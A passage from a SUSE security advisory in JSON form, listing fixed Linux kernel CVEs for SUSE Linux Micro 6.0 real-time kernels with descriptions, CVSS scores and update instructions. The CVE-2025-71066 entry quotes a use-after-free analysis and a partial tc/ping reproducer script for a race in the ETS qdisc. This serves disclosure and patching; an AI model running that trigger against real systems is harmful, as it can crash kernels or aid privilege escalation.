"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71071",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71071"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/mediatek: fix use-after-free on probe deferral\n\nThe driver is dropping the references taken to the larb devices during\nprobe after successful lookup as well as on errors. This can\npotentially lead to a use-after-free in case a larb device has not yet\nbeen bound to its driver so that the iommu driver probe defers.\n\nFix this by keeping the references as expected while the iommu driver is\nbound.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71071",
"url": "https://www.suse.com/security/cve/CVE-2025-71071"
},
{
"category": "external",
"summary": "SUSE Bug 1256802 for CVE-2025-71071",
"url": "https://bugzilla.suse.com/1256802"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71071"
},
{
"cve": "CVE-2025-71077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71077"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: Cap the number of PCR banks\n\ntpm2_get_pcr_allocation() does not cap any upper limit for the number of\nbanks. Cap the limit to eight banks so that out of bounds values coming\nfrom external I/O cause on only limited harm.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71077",
"url": "https://www.suse.com/security/cve/CVE-2025-71077"
},
{
"category": "external",
"summary": "SUSE Bug 1256613 for CVE-2025-71077",
"url": "https://bugzilla.suse.com/1256613"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71078"
},
{
"cve": "CVE-2025-71079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71079"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write\n\nA deadlock can occur between nfc_unregister_device() and rfkill_fop_write()\ndue to lock ordering inversion between device_lock and rfkill_global_mutex.\n\nThe problematic lock order is:\n\nThread A (rfkill_fop_write):\n rfkill_fop_write()\n mutex_lock(\u0026rfkill_global_mutex)\n rfkill_set_block()\n nfc_rfkill_set_block()\n nfc_dev_down()\n device_lock(\u0026dev-\u003edev) \u003c- waits for device_lock\n\nThread B (nfc_unregister_device):\n nfc_unregister_device()\n device_lock(\u0026dev-\u003edev)\n rfkill_unregister()\n mutex_lock(\u0026rfkill_global_mutex) \u003c- waits for rfkill_global_mutex\n\nThis creates a classic ABBA deadlock scenario.\n\nFix this by moving rfkill_unregister() and rfkill_destroy() outside the\ndevice_lock critical section. Store the rfkill pointer in a local variable\nbefore releasing the lock, then call rfkill_unregister() after releasing\ndevice_lock.\n\nThis change is safe because rfkill_fop_write() holds rfkill_global_mutex\nwhile calling the rfkill callbacks, and rfkill_unregister() also acquires\nrfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will\nwait for any ongoing callback to complete before proceeding, and\ndevice_del() is only called after rfkill_unregister() returns, preventing\nany use-after-free.\n\nThe similar lock ordering in nfc_register_device() (device_lock -\u003e\nrfkill_global_mutex via rfkill_register) is safe because during\nregistration the device is not yet in rfkill_list, so no concurrent\nrfkill operations can occur on this device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71079",
"url": "https://www.suse.com/security/cve/CVE-2025-71079"
},
{
"category": "external",
"summary": "SUSE Bug 1256619 for CVE-2025-71079",
"url": "https://bugzilla.suse.com/1256619"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: stm32: sai: fix OF node leak on probe\n\nThe reference taken to the sync provider OF node when probing the\nplatform device is currently only dropped if the set_sync() callback\nfails during DAI probe.\n\nMake sure to drop the reference on platform probe failures (e.g. probe\ndeferral) and on driver unbind.\n\nThis also avoids a potential use-after-free in case the DAI is ever\nreprobed without first rebinding the platform driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71081",
"url": "https://www.suse.com/security/cve/CVE-2025-71081"
},
{
"category": "external",
"summary": "SUSE Bug 1256609 for CVE-2025-71081",
"url": "https://bugzilla.suse.com/1256609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71081"
},
{
"cve": "CVE-2025-71082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: revert use of devm_kzalloc in btusb\n\nThis reverts commit 98921dbd00c4e (\"Bluetooth: Use devm_kzalloc in\nbtusb.c file\").\n\nIn btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This\nties the lifetime of all the btusb data to the binding of a driver to\none interface, INTF. In a driver that binds to other interfaces, ISOC\nand DIAG, this is an accident waiting to happen.\n\nThe issue is revealed in btusb_disconnect(), where calling\nusb_driver_release_interface(\u0026btusb_driver, data-\u003eintf) will have devm\nfree the data that is also being used by the other interfaces of the\ndriver that may not be released yet.\n\nTo fix this, revert the use of devm and go back to freeing memory\nexplicitly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71082",
"url": "https://www.suse.com/security/cve/CVE-2025-71082"
},
{
"category": "external",
"summary": "SUSE Bug 1256611 for CVE-2025-71082",
"url": "https://bugzilla.suse.com/1256611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71082"
},
{
"cve": "CVE-2025-71083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Avoid NULL pointer deref for evicted BOs\n\nIt is possible for a BO to exist that is not currently associated with a\nresource, e.g. because it has been evicted.\n\nWhen devcoredump tries to read the contents of all BOs for dumping, we need\nto expect this as well -- in this case, ENODATA is recorded instead of the\nbuffer contents.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71083",
"url": "https://www.suse.com/security/cve/CVE-2025-71083"
},
{
"category": "external",
